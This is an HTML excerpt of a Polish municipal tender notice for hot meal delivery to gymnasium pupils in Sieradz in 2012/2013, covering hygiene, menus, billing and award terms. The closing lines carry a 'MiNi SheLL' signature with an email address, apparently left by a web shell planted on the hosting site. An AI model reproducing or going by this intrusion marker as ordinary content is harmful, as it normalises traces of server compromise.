<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie i9 dostawa gorącego posilku dla uczniów Publicznego Gimnazjum Gminy Sieradz w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Przygotowanie i dostawa gorącego posiłku dla około 75 uczniów Publicznego Gimnazjum Gminy Sieradz mieszczącego się przy ul. Armii Krajowej nr 5 w Sieradzu w roku szkolnym 2012/2013.
2. Wykonawca jest zobowiązany dostarczać posiłki  w specjalnych termosach służących do przewozu żywności, które spełniają wszelkie wymogi sanitarno-higieniczne. Ponadto musi posiadać pojazd do przewozu żywności dopuszczony do ruchu na podstawie aktualnej zgody sanepidu. Powyższe należy udokumentować decyzją o dopuszczeniu pojazdu w zakresie przewozu posiłków obiadowych w opakowaniach transportowych.
3. Wykonawca musi posiadać aktualną umowę na odbiór i unieszkodliwienie odpadów pokonsumpcyjnych.
4.  Zakres zamówienia obejmuje przygotowanie, dostawę i wydawanie posiłku w szkole w dni nauki szkolnej w godzinach od 12.25 do  13.40.
5.Wykonawca zapewni na własny koszt naczynia wymagane do spożycia posiłków tj. talerze, sztućce, szklanki oraz zadba o ich utrzymanie w czystości i sterylizację oraz potrzebny do tego sprzęt zgodnie z obowiązującymi przepisami.
6.  Zamawiający w placówce oświatowej udostępni Wykonawcy pomieszczenie kuchenne wraz z urządzeniami zaplecza kuchennego. Wykonawca jest zobowiązany do wyposażenia pomieszczenia w szafę przelotową. 
7. Wykonawca jest zobowiązany do posprzątania po wydaniu posiłku i w związku z tym będzie miał do dyspozycji sprzęt kuchenny (zmywarka do naczyń), będący w wyposażeniu palcówki oświatowej.
8. Wydawanie posiłków powinno przebiegać w sposób umożliwiający zachowanie godności klienta.
9. Jadłospis  układany będzie przez Wykonawcę na okres 10 dni i dostarczany Zamawiającemu do wcześniejszego zatwierdzenia. Wszystkie zmiany w jadłospisie sugerowane Zamawiającemu będą wiążące dla Wykonawcy. 
10. Posiłki powinny być przygotowane zgodnie z zasadami racjonalnego żywienia. Muszą być  urozmaicone o wysokiej wartości odżywczej , atrakcyjne pod względem organoleptycznym, sporządzone wg zasad Instytutu Żywności i Żywienia w Warszawie.
11. Obiad powinien składać się z zupy z wkładką  mięsną z dodatkiem pieczywa lub drugiego dania. Zupa z wkładką może występować raz w tygodniu.
12. Sposób przygotowania obiadu:
 a) zupy należy przygotowywać na wywarach jarskich (warzywnych)  lub mięsnych z dodatkiem głównego składnika, zupy na wywarach z kości w ograniczonych ilościach;
b) doprawianie zup nisko tłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażką;
c) drugie danie powinno składać się  z produktów  białkowych, najlepiej pochodzenia zwierzęcego (mięso, ryby, drób- zamiennie), produktów bogatych  we węglowodany złożone (ziemniaki, kasze, kluski- zamiennie) oraz dodatków warzywnych (surówki, warzywa gotowane- zamiennie) plus kompot.
13. Zamawiający oczekuje, iż Wykonawca będzie przygotowywał posiłki  o charakterze prozdrowotnym poprzez: stosowanie tłuszczów roślinnych, - ograniczone stosowanie tłuszczów zwierzęcych, - umiarkowane stosowanie mięsa czerwonego, -stosowanie mięsa drobiowego, -stosowanie ryb, -umiarkowane stosowanie jaj, cukru, soli,- duży udział warzyw i owoców w posiłkach, w tym także nasion roślin strączkowych.
14. Dostarczane posiłki muszą być gorące.
15. Posiłki wydawane będą po okazaniu imiennej listy sporządzonej przez pracownika Gminnego Ośrodka Pomocy Społecznej.
16. Wymaga się bezwzględnego przestrzegania przepisów higieniczno -sanitarnych podczas przygotowywania, transportu, wydawania posiłków oraz po ich wydaniu.
17. Zamawiający zastrzega, że ilość wydawanych posiłków może ulec zmianie o czym poinformuje Wykonawcę na 2 dni przed planowaną zmianą.
18. W cenie posiłku powinien zawierać się koszt jego przygotowania, dostawy i wydania.
19. W okresach comiesięcznych dostawa ciepłych posiłków rozliczana będzie  przez Wykonawcę, zgodnie z przekazaną do Gminnego Ośrodka Pomocy Społecznej fakturą VAT oraz załączoną imienną listą osób, którzy skorzystali z tej formy pomocy w danym miesiącu podpisaną przez dyrektora szkoły.
20. Zaleca się aby Wykonawca  dokonał wizji lokalnej lokalu, w którym będą przygotowywane i wydawane posiłki oraz aby dokonał wizji lokalnej tras, którymi posiłki będą dostarczane do szkół na terenie gminy.
21. Wizji lokalnej Wykonawca dokonuje na własny koszt i ryzyko w celu uzyskania informacji, które mogą być konieczne do przygotowania ofert.
22. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania spowoduje wykluczenie Wykonawcy z dalszego postępowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.42.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com